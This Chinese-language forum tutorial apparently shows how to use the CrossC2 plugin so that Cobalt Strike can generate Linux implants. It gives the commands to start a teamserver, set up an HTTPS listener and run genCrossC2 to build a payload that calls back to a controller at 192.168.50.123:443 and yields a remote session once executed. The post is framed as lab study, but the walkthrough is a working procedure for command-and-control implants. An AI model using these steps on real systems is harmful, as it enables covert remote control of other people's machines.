Linux平台上的CobaltStrike上线:实现攻击利用的最新方法

前言

在之前的文章中,我们详细介绍了CobaltStrike的安装、汉化以及基本使用。然而,就像任何工具一样,CS也并非完美无缺。在使用过程中,我们发现 CS 生成 shell 时只能在 Windows 平台下生成 .exe 文件,而对于 Mac 和 Linux 主机却无法生成相应的 shell。这严重影响了我们的学习进程。那么,面对这个问题,我们应该如何解决呢?

为了解决这一问题,我们需要借助第三方插件 – CrossC2。

实验环境

  • Kali Linux 2022
  • CobaltStrike 4.5
  • CentOS 7(如果没有,可以使用 Kali 替代)
  • 同一局域网(外网需要进行映射)

下载和配置 CrossC2

首先,访问 CrossC2 的项目地址:https://github.com/gloxec/CrossC2/releases,下载两个文件:CrossC2-GithubBot-2022-06-07.cnagenCrossC2.Linux。前者是 CS 的插件文件。

图片[1]-Linux平台上的CobaltStrike上线:实现攻击利用的最新方法-山海云端论坛

下载完成后,将文件复制到 Kali Linux 中的 CS 目录下。

图片[2]-Linux平台上的CobaltStrike上线:实现攻击利用的最新方法-山海云端论坛

启动 CobaltStrike:

# 启动服务端 ./teamserver 192.168.50.123 123 # 启动 CS ./cobaltstrike

图片[3]-Linux平台上的CobaltStrike上线:实现攻击利用的最新方法-山海云端论坛

将 CrossC2 插件安装到 CS 中,依次点击 CobaltStrike – 脚本管理器,选择我们的插件并载入。

图片[4]-Linux平台上的CobaltStrike上线:实现攻击利用的最新方法-山海云端论坛

现在,菜单栏中会出现 CrossC2 的选项。

配置 HTTPS 监听

由于 Linux 的 shell 目前只支持 HTTPS,我们在 CS 中进行 HTTPS 监听的配置。

图片[5]-Linux平台上的CobaltStrike上线:实现攻击利用的最新方法-山海云端论坛

生成 Linux 终端下的 Shell

有两种生成方法,首先看第一种。在 CS 目录下运行以下命令:

./genCrossC2.Linux 192.168.50.123 443 .cobaltstrike.beacon_keys null Linux x64 /tmp/test

参数说明:

图片[6]-Linux平台上的CobaltStrike上线:实现攻击利用的最新方法-山海云端论坛

这样,在 Kali 的 tmp 目录下生成了一个 test 文件,执行命令 ./test 就可以得到会话。

第二种方法是直接使用 CrossC2 生成,但由于版本多样性,这种方法并不一定成功。建议采用第一步的方式。

图片[7]-Linux平台上的CobaltStrike上线:实现攻击利用的最新方法-山海云端论坛

效果

图片[8]-Linux平台上的CobaltStrike上线:实现攻击利用的最新方法-山海云端论坛
© 版权声明
THE END
喜欢就支持一下吧
点赞11 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容